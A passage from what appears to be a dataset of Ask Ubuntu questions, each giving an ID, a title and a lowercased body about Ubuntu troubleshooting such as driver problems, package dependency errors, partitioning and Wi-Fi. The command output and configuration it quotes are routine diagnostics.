sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x14df4121 device boot start end blocks id system /dev/sdb1 2048 725110783 362554368 7 hpfs/ntfs/exfat /dev/sdb2 * 725110784 726134783 512000 83 linux /dev/sdb3 726134784 850939903 62402560 8e linux lvm /dev/sdb4 850941950 976771071 62914561 5 extended partition 4 does not start on physical sector boundary . /dev/sdb5 850941952 851916799 487424 83 linux /dev/sdb6 851918848 863635455 5858304 82 linux swap / solaris /dev/sdb7 863637504 883167231 9764864 83 linux /dev/sdb8 883169280 976771071 46800896 83 linux thanks for any help in advance . jeremie
131826	lightdm is n't displaying backdrop	i installed the ati catalyst driver a couple days ago and since then i have n't been able to see anything other than a boring purple screen when i try to log in . the boot splash has also been affected . what should i do to get things back to normal ?
131827	no boot option after ubuntu install	i just installed ubuntu on my windows vista laptop using the windows installer.after the install i rebooted the system and ubuntu started automatically . when i restarted again i did not get the option of choosing os and directly went to windows . i am a noob . thanks for any help .
131831	problem mounting my internal hard drive ... any suggestions ?	i 'm a beginner with ubuntu , booting it via usb in order to see if i can recover files from my hard drive after a crash . i clicked on my hard drive in order to mount it , and got `` unable to mount 151 gb filesystem '' as the title of an error message . it then goes on to say : error mounting : mount exited with exit code 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . * does this indicate a total hard drive failure , or is there a way to correct this error and access my files ? tnx jw
131834	ca n't create a new project or file - first screen empty nb 7.1.1 and 7.1.2	the first screen in the wizard is blank or empty , only shows me cancel button . i 'm working in ubuntu 12.04 . i reinstalled netbeans and the problem is still there , i tried with nb 7.1.1 and nb 7.1.2 . i 'm using oracle jdk 7 .
131840	how to get keepass to properly work with chromium ?	the two-channel auto-type obfuscation feature of keepass does n't work for me with chromium ( on ubuntu 12.04 64 bits ) . however , it works just fine with firefox . dows anyone know how to fix this ? textboxes in web forms in chromium seems to have something special that causes this feature to fail . only some of the username/password characters are being auto-typed . this might be related to this : if i select an entry in keepass and click `` copy user name '' , i can paste it fine with ctrl+v in any textbox in firefox , but i ca n't on chromium . however , text copied using ctrl+c from a regular text file ( say , from gedit ) , can be pasted fine on both browsers . what may be wrong ? i would n't like to deactive this feature for all the entries in my keepass files as i use them on windows too and they work just fine there ( even on google chrome for windows ) . this feature gives an appreciated extra security measure against spyware/keyloggers .
131843	successfully installed sass , but the terminal insists it is n't	i wanted to install sass version 3.2.0 alpha . i first ran sudo apt-get install libhaml-ruby1.8 , which is what the console recommended it successfully installed , but it installed an older version of sass . just in case , i tried installing it via rubygems : sudo apt-get install rubygems1.8 sudo gem install sass this just reinstalled sass 3.1.17 . as per the recommendation here , i tried running the following : sudo gem uninstall -iax sass sudo gem install sass -- pre this stated that sass 3.2.0 alpha was successfully installed . however , sass no longer seems to work at all . typing sass -- watch styles.scss ... returns ... the program 'sass ' is currently not installed . you can install it by typing : suto apt-get install libhaml-ruby1.8 so now i 've gone full circle . what can i do to get sass working from the console ?
131844	lshw not showing network	output : { user } @ { computer } : ~ $ sudo lshw -class network { user } @ { computer } : ~ $ another test : { user } @ { computer } : ~ $ lspci 00:00.0 ram memory : nvidia corporation mcp61 memory controller ( rev a1 ) 00:01.0 isa bridge : nvidia corporation mcp61 lpc bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp61 usb 1.1 controller ( rev a3 ) 00:02.1 usb controller : nvidia corporation mcp61 usb 2.0 controller ( rev a3 ) 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 00:06.0 ide interface : nvidia corporation mcp61 ide ( rev a2 ) 00:07.0 bridge : nvidia corporation mcp61 ethernet ( rev a2 ) < < -- -- network card ? ? ? ? 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:08.1 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 firewire ( ieee 1394 ) : lsi corporation fw322/323 ( rev 70 ) 02:00.0 vga compatible controller : nvidia corporation g96 [ geforce 9500 gt ] ( rev a1 ) if you look at 00:07.0 i believe that is the network card . however lshw doesnt show it . i mainly need information on network speed 10mbps/100mbsp/1000mbps though knowing why my system is n't working would be nice .
131846	binding an action to a combination of mouse buttons	i know that x-system limits binding an action to a combination of mouse buttons ( e.g . right click + mouse wheel up/down which i used to bind to sound volume up/down in windows but i can not do the same thing under linux ) but i was wondering if there is any way to get around this limitation ? thanks in advance for your response
131855	upgrading to gimp 2.8 ppa fails with `` dpkg-deb error '' ?	upgrading gimp gives the following error : preparing to replace gimp 2.6.12-1ubuntu1 ( using ... /gimp_2.8.0-1ubuntu0ppa3~precise_amd64.deb ) ... unpacking replacement gimp ... dpkg : error processing /var/cache/apt/archives/gimp_2.8.0-1ubuntu0ppa3~precise_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/gimp/2.0/plug-ins/file-xmc ' , which is also in package gimp-plugin-registry 3.5.4-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/gimp_2.8.0-1ubuntu0ppa3~precise_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
131856	how to get packages from ubuntu ultimate edition iso ?	i have an ubuntu ultimate edition 3.0 iso , how to extract packages from that iso ? it contains no /pool directory a casper folder containing a squashfs file : ( i need wine & java packages from it : (
131857	alsamixer : howto disable auto-mute mode	i 've tried do undo this but not able to get it disabled . my sound settings need to be redone every boot up as well , but asking that question as well would get neg . feedback . how to get microphone to work on acer aspire one 722
131858	unmet dependencies after attempting to install skype . now i can not install any package	i tried to install skype by downloading the .deb file from their website . the installation aborted due to unmet dependencies and skype was not installed by ubuntu software center . from then on , i could n't install any packages and none of the package management utilities worked : they all complained of unmet dependencies . i tried sudo apt-get install -f it could n't fix the issue . here is the output from the command tutysra @ tutysra-devel : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libsdl-ttf2.0-0 libsdl-mixer1.2 libsdl-image1.2 libmikmod2 libsdl-net1.2 libboost-regex1.46.1 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libqt4-declarative : i386 libqt4-designer : i386 libqt4-opengl : i386 libqt4-qt3support : i386 libqt4-scripttools : i386 libqt4-sql-mysql : i386 libqt4-sql-sqlite libqt4-svg : i386 libqt4-test : i386 libqtgui4 : i386 qdbus suggested packages : libqt4-declarative-folderlistmodel : i386 libqt4-declarative-gestures : i386 libqt4-declarative-particles : i386 libqt4-declarative-shaders : i386 qt4-qmlviewer : i386 libqt4-dev : i386 libqt4-dev qt4-qtconfig : i386 the following packages will be upgraded : libqt4-declarative : i386 libqt4-designer : i386 libqt4-opengl : i386 libqt4-qt3support : i386 libqt4-scripttools : i386 libqt4-sql-mysql : i386 libqt4-sql-sqlite libqt4-svg : i386 libqt4-test : i386 libqtgui4 : i386 qdbus 11 upgraded , 0 newly installed , 0 to remove and 61 not upgraded . 21 not fully installed or removed . need to get 0 b/10.7 mb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 172294 files and directories currently installed . ) preparing to replace libqt4-sql-sqlite 4:4.8.1-0ubuntu4 ( using ... /libqt4-sql-sqlite_4 % 3a4.8.1-0ubuntu4.1_amd64.deb ) ... unpacking replacement libqt4-sql-sqlite ... preparing to replace qdbus 4:4.8.1-0ubuntu4 ( using ... /qdbus_4 % 3a4.8.1-0ubuntu4.1_amd64.deb ) ... unpacking replacement qdbus ... processing triggers for man-db ... dpkg : error processing libqtgui4 : i386 ( -- configure ) : libqtgui4 : i386 4:4.8.1-0ubuntu4 can not be configured because libqtgui4 : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : error processing libqt4-declarative : i386 ( -- configure ) : libqt4-declarative : i386 4:4.8.1-0ubuntu4 can not be configured because libqt4-declarative : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : error processing libqt4-svg : i386 ( -- configure ) : libqt4-svg : i386 4:4.8.1-0ubuntu4 can not be configured because libqt4-svg : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : error processing libqtgui4 ( -- configure ) : libqtgui4 : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqtgui4 : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : error processing libqt4-declarative ( -- configure ) : libqt4-declarative : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-declarative : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried removing libqt4-test by sudo apt-get remove -f libqt4-test but could n't since the package manager refused to remove it without resolving the unmet dependencies . i ran dpkg -- configure -a and this was the output : tutysra @ tutysra-devel : ~ $ sudo dpkg -- configure -a dpkg : error processing libqtgui4 ( -- configure ) : libqtgui4 : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqtgui4 : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : error processing libqtgui4 : i386 ( -- configure ) : libqtgui4 : i386 4:4.8.1-0ubuntu4 can not be configured because libqtgui4 : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : dependency problems prevent configuration of ia32-libs-multiarch : i386 : ia32-libs-multiarch : i386 depends on libqtgui4 ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing ia32-libs-multiarch : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-declarative ( -- configure ) : libqt4-declarative : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-declarative : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : error processing libqt4-declarative : i386 ( -- configure ) : libqt4-declarative : i386 4:4.8.1-0ubuntu4 can not be configured because libqt4-declarative : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : error processing libqt4-svg ( -- configure ) : libqt4-svg : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-svg : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : error processing libqt4-svg : i386 ( -- configure ) : libqt4-svg : i386 4:4.8.1-0ubuntu4 can not be configured because libqt4-svg : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : error processing libqt4-sql-mysql ( -- configure ) : libqt4-sql-mysql : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-sql-mysql : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : error processing libqt4-sql-mysql : i386 ( -- configure ) : libqt4-sql-mysql : i386 4:4.8.1-0ubuntu4 can not be configured because libqt4-sql-mysql : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : dependency problems prevent configuration of ia32-libs : ia32-libs depends on ia32-libs-multiarch ; however : package ia32-libs-multiarch is not installed . package ia32-libs-multiarch : i386 is not configured yet . dpkg : error processing ia32-libs ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-opengl ( -- configure ) : libqt4-opengl : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-opengl : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : error processing libqt4-opengl : i386 ( -- configure ) : libqt4-opengl : i386 4:4.8.1-0ubuntu4 can not be configured because libqt4-opengl : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : dependency problems prevent configuration of libqtwebkit4 : i386 : libqtwebkit4 : i386 depends on libqtgui4 ( > = 4:4.8.0 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqtwebkit4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-designer ( -- configure ) : libqt4-designer : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-designer : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : error processing libqt4-designer : i386 ( -- configure ) : libqt4-designer : i386 4:4.8.1-0ubuntu4 can not be configured because libqt4-designer : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : dependency problems prevent configuration of libqt4-help : libqt4-help depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-help ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-scripttools ( -- configure ) : libqt4-scripttools : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-scripttools : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : error processing libqt4-scripttools : i386 ( -- configure ) : libqt4-scripttools : i386 4:4.8.1-0ubuntu4 can not be configured because libqt4-scripttools : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : dependency problems prevent configuration of libqt4-qt3support : i386 : libqt4-qt3support : i386 depends on libqt4-designer ( = 4:4.8.1-0ubuntu4 ) ; however : package libqt4-designer : i386 is not configured yet . libqt4-qt3support : i386 depends on libqt4-network ( = 4:4.8.1-0ubuntu4 ) ; however : version of libqt4-network : i386 on system is 4:4.8.1-0ubuntu4.1 . libqt4-qt3support : i386 depends on libqt4-sql ( = 4:4.8.1-0ubuntu4 ) ; however : version of libqt4-sql : i386 on system is 4:4.8.1-0ubuntu4.1 . libqt4-qt3support : i386 depends on libqt4-xml ( = 4:4.8.1-0ubuntu4 ) ; however : version of libqt4-xml : i386 on system is 4:4.8.1-0ubuntu4.1 . libqt4-qt3support : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4 ) ; however : version of libqtcore4 : i386 on system is 4:4.8.1-0ubuntu4.1 . libqt4-qt3support : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-qt3support : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-test ( -- configure ) : libqt4-test : amd64 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-test : i386 is in a different version ( 4:4.8.1-0ubuntu4 ) dpkg : error processing libqt4-test : i386 ( -- configure ) : libqt4-test : i386 4:4.8.1-0ubuntu4 can not be configured because libqt4-test : amd64 is in a different version ( 4:4.8.1-0ubuntu4.1 ) errors were encountered while processing : libqtgui4 libqtgui4 : i386 ia32-libs-multiarch : i386 libqt4-declarative libqt4-declarative : i386 libqt4-svg libqt4-svg : i386 libqt4-sql-mysql libqt4-sql-mysql : i386 ia32-libs libqt4-opengl libqt4-opengl : i386 libqtwebkit4 : i386 libqt4-designer libqt4-designer : i386 libqt4-help libqt4-scripttools libqt4-scripttools : i386 libqt4-qt3support : i386 libqt4-test libqt4-test : i386 i require some help/pointers on resolving this issue .
131862	lubuntu power settings ( xfce4-power-manager ) wo n't dim-screen to save power	this is my first post - i 've not been able to find any other people with the same problem ! i 'm using lubuntu 12.04 on an acer aspireone happy2 netbook ( intel atom n570 ) having grown quite frustrated with the slow responsiveness of unity on my computer . i 've used the power manager to set my screen to dim on battery after 30 seconds ( and tried 10 , 60 , etc etc ) but it wo n't do anything . i really want to use this setting as i use by netbook on the go a lot and will get a fair power saving out of it . could there be conflict stopping this from working ? i 've tried lots of tests and options , with no joy . thanks ! ( 7/5/12 edit ) thank you very much for your advice - i 've removed xscreensaver , but unfortunately it has n't fixed the problem . i can adjust the brightness using the system keys on my keyboard , so i can rule out a problem with the brightness control . i think it might be the interaction between the power-manager and the screen brightness controller .
131863	installing ubuntu on asus a43sm	i 've asus laptop a43sm the specifications can be seen here . i am trying to install ubuntu 12.04 lts on my laptop , but something wrong is happening . when i boot up ubuntu on this laptop the first screen ubuntu loader shows up , but then it freezes ; i ca n't do anything but push the power button . i 've tried to use a usb drive and a cd but that does n't help . anyone can tell me how to install ubuntu ?
131866	how do i switch back from location bar to path bar ?	i use ctrl+l to switch the graphical path bar ( sometimes called a breadcrumb ) into a text-based location bar . i expect that hitting ctrl+l again will switch back , but it does n't . is this a bug ? if not , how do i switch back ? ( i do n't want to make the change permanent . )
131868	how do i remove the launcher from my second monitor display ?	my workspace extends , and is not a mirror or copy of original display , but i still get the vertical purple icon launcher bar on both screens and see no way to remove it . please advise !
131872	synaptic touchpad right-click not working	i 'm having the same problem as in previous ubuntu versions . the workaround to the problem for 11.10 was to use https : //launchpad.net/~sergio91pt/+archive/synaptics+clickpads , but for 12.04 i have n't found a solution that works . hp 210-1095tu netbook atom n450 ram 2gb
131873	windows 7 is not accessible or ca n't be repaired after installing ubuntu 11.10 using live usb	i 've messed things up a bit . i was running windows 7 ultimate 64-bit in my hp laptop . i was using live usb of ubuntu 11.10 and then i tried to install ubuntu on hard disk using the same live usb . to install ubuntu , i choose 50 gb free partition and 325 gb swap space or something . while installing ubuntu , my pen-drive came out and everything stopped . then i booted again using the pen-drive and finished installation of ubuntu . now the problem is i ca n't access my windows partition as they were in extended partition plus i am not able to boot windows7 from the booting screen and i ca n't even repair or recover it . whenever i try to boot windows it shows the message hardware inaccessible , try to repair your windows using disc . when i tried using disc , there was no instance of os available to repair . i ca n't even install fresh windows 7 as the setup asks me to load drivers of hard disk . i have important data in the windows root drive as well as in other partitions . how can i recover that data ?
131879	corrupted file ubuntu os download ( 11.10 & 12.4 )	two time i tried to download ubuntu 11.10 version and 12.04 version . but both files are corrupted , unable to install . when i install ubuntu 11.10 , after 5 minutes it shows file missing , unable to install . last night i downloaded ubuntu 12.04 version but today when i start installing it , it shows unable to boot - please use a kernel appropriate for your cpu . what should i do ? my pc configration : processor : amd athlon 64 x2 2.913 ghz 500gb hdd hitachi nvidia chipset last time i downloaded ubuntu 11.04 , it was installed properly and worked properly but know i face big problem . now i fed-up . please help me , what should i do ?
131881	why did i have to remove resolvconf to get dnsmasq to work again ?	yesterday i upgraded to precise and dnsmasq stopped working . that is , dns queries to localhost where dnsmasq is listening ( 127.0.0.1 ) were refused . removing resolvconf ( apt-get remove resolvconf ) and rebooting solved the issue ( found that suggestion somewhere on google ) . /etc/resolv.conf looked fine with and without resolvconf in place . no difference at all . why would i use resolvconf ? are there any benefits ? the wikipedia article covering resolvconf sucks . why did resolvconf interfere with dnsmasq ? is this a known issue ?
131884	bt mouse disconnects after upgrade to 12.04	after upgrade to kubuntu 12.04 my bt mouse disconnects after some time not using it . this may be normal , but when i am back to my notebook and want to proceed work , it does not reconnect . befor upgrading it either did not disconnect or it did and reconnected without my notice . i read already there could be some sort of timeout ( maybe energy saving ) but i did not find a solution . till now i have to press the small button on my mouse bottom side ( named `` connect '' ) and second i have to press the connect button in the bt applet in kubuntu , ( named `` blue devil '' ) . quite annoying ... any hints ? thanks a lot
131885	help me for doing partitioning	i want to install ubuntu 12.04 ( a fresh installation ) in my pc but i have no knowledge about doing partition please give some informations for doing partition my system configuration is : hard disk 20gb ide processor : intel ( r ) pentim ( r ) 4 cpu 2.40ghz ram : 1 gb i like to doing partition these like / = 5 gb swap = 2 gb /boot = 5 gb /home = 3 gb ( my files music , videos etc are saved in my pen drive or cd ) /tmp = 5 gb please guide or advice to me for doing partitoning i do n't know what happend doing partitioning without /boot i would like to study about python and gtk programming please advise me suitabe partition
131900	how do i switch the command key and control key on a macbook pro ?	i have scoured the web , and i ca n't seem to get xmodmap / anything to work properly . i want to swap both my command keys with my control key - in essence , inverting what they do currently . how would i do that ? i tried xmodmap -e `` keycode 133 = control_l '' and corresponding commands for keycodes 134 ( right command ) and 37 ( control left ) . i even tried these commands , plus xmodmap -pke > ~/.xmodmap and xmodmap ~/.xmodmap in .xinitrc . my end goal is i want hud / dash to come up when i click control and command to functional control , i.e. , control-v is a commond shortcut to paste , i would click command-v
131902	needs of /boot , what is the problem without /boot	i do n't know what is the need of /boot what is the problem doing partition without /boot ? i decided to create a `` 5 gb /boot '' partition on my 20 gb hard disk .
131905	xorg.conf and unity3d ?	for some reason , i can not seem to use unity3d with the following xorg.conf file : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' screen 3 `` screen3 '' rightof `` screen2 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` acer al1916 '' horizsync 31.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` acer al1916 '' horizsync 31.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` unknown '' modelname `` acer al1916 '' horizsync 31.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor3 '' vendorname `` unknown '' modelname `` acer al1916 '' horizsync 31.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 520 '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 520 '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 520 '' busid `` pci:6:0:0 '' screen 0 endsection section `` device '' identifier `` device3 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 520 '' busid `` pci:6:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` crt-0 : 1280x1024_75 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt-1 : 1280x1024_75 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt-0 : 1280x1024_75 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen3 '' device `` device3 '' monitor `` monitor3 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt-1 : 1280x1024_75 +0+0 '' subsection `` display '' depth 24 endsubsection endsection at the moment , if i chose unity3d , it will just display on 1 screen , if i choose unity2d it will mirror 1 screen to all screens , so i have to resort to gnome-classic to get all 4 screens to work with the above xorg.conf . after further testing , i have font that unity3d works if i just have 1 or 2 monitors connected to a single graphics card . if i connect a single monitor to each graphics card , unity3d will not work , it drops down to unity2d . if i connect 3 monitors , i.e . 2 monitors on card 1 and 1 monitor on card 2 , it drops down to unity2d . if i connect 2 monitors each to each card , it again drops down to unity2d . so it seems that unity3d only works with a single graphics card ... how can this be fixed ?
131910	packet loss with ubuntu 11.10	i have a machine with windows 7 and ubuntu 11.10 in ubuntu i have about 30 % packet loss when i make pings either to my router gateway or to an external site such as google.com , so my internet connection goes very slow . since the network works perfectly fine in windows 7 ( without any packet loss ) , i assume it 's not a problem of the line . is there anything i could change in network settings or something similar in order to make this work correctly in ubuntu ? i edit to say that i found my solution here ( the problem was defective realtek drivers ) : how do i stop my ethernet network connection from dropping ?
131912	wireless not working on dell xps 17 after installing 12.04	i ( linux newbie ) have a dell xps 17 and tried to install ubuntu 12.04 . after installation all wlan accesspoints near are detected . but i can not connect ( but i am able to connect with other computers as well as with dell xps 17 under windows ) . outputs : iwconfig lo no wireless extensions . wlan0 ieee 802.11bg essid : '' lerchenpoint '' mode : managed frequency:2.412 ghz access point : 58:6d:8f : a0:2d:58 bit rate=1 mb/s tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-37 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:19 missed beacon:0 eth0 no wireless extensions . sudo lshw -class network *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : 00:26 : c7:99:98:28 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-24-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:50 memory : f0400000-f0401fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0a:00.0 logical name : eth0 version : 06 serial : f0:4d : a2:56 : e3:94 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.0.123 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:47 ioport:6000 ( size=256 ) memory : f0a04000-f0a04fff memory : f0a00000-f0a03fff dmesg | grep iwl [ 10.157531 ] iwlwifi 0000:04:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 10.157561 ] iwlwifi 0000:04:00.0 : setting latency timer to 64 [ 10.157598 ] iwlwifi 0000:04:00.0 : pci_resource_len = 0x00002000 [ 10.157599 ] iwlwifi 0000:04:00.0 : pci_resource_base = ffffc90011090000 [ 10.157601 ] iwlwifi 0000:04:00.0 : hw revision id = 0x0 [ 10.157731 ] iwlwifi 0000:04:00.0 : irq 50 for msi/msi-x [ 10.157834 ] iwlwifi 0000:04:00.0 : detected intel ( r ) centrino ( r ) wireless-n 1000 bgn , rev=0x6c [ 10.157976 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 10.179772 ] iwlwifi 0000:04:00.0 : device eeprom ver=0x15d , calib=0x6 [ 10.179775 ] iwlwifi 0000:04:00.0 : device sku : 0x50 [ 10.179777 ] iwlwifi 0000:04:00.0 : valid tx ant : 0x1 , valid rx ant : 0x3 [ 10.179796 ] iwlwifi 0000:04:00.0 : tunable channels : 13 802.11bg , 0 802.11a channels [ 10.574728 ] iwlwifi 0000:04:00.0 : loaded firmware version 39.31.5.1 build 35138 [ 10.726409 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 19.714132 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 19.777862 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 2251.603089 ] iwlwifi 0000:04:00.0 : pci int a disabled [ 2266.578350 ] iwlwifi 0000:04:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 2266.578399 ] iwlwifi 0000:04:00.0 : setting latency timer to 64 [ 2266.578435 ] iwlwifi 0000:04:00.0 : pci_resource_len = 0x00002000 [ 2266.578437 ] iwlwifi 0000:04:00.0 : pci_resource_base = ffffc90011090000 [ 2266.578439 ] iwlwifi 0000:04:00.0 : hw revision id = 0x0 [ 2266.578704 ] iwlwifi 0000:04:00.0 : irq 50 for msi/msi-x [ 2266.578808 ] iwlwifi 0000:04:00.0 : detected intel ( r ) centrino ( r ) wireless-n 1000 bgn , rev=0x6c [ 2266.578916 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 2266.600709 ] iwlwifi 0000:04:00.0 : device eeprom ver=0x15d , calib=0x6 [ 2266.600712 ] iwlwifi 0000:04:00.0 : device sku : 0x50 [ 2266.600713 ] iwlwifi 0000:04:00.0 : valid tx ant : 0x1 , valid rx ant : 0x3 [ 2266.600727 ] iwlwifi 0000:04:00.0 : tunable channels : 13 802.11bg , 0 802.11a channels [ 2266.605978 ] iwlwifi 0000:04:00.0 : loaded firmware version 39.31.5.1 build 35138 [ 2266.606331 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 2266.614179 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 2266.681541 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s solutions i tried : rfkill list all 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : 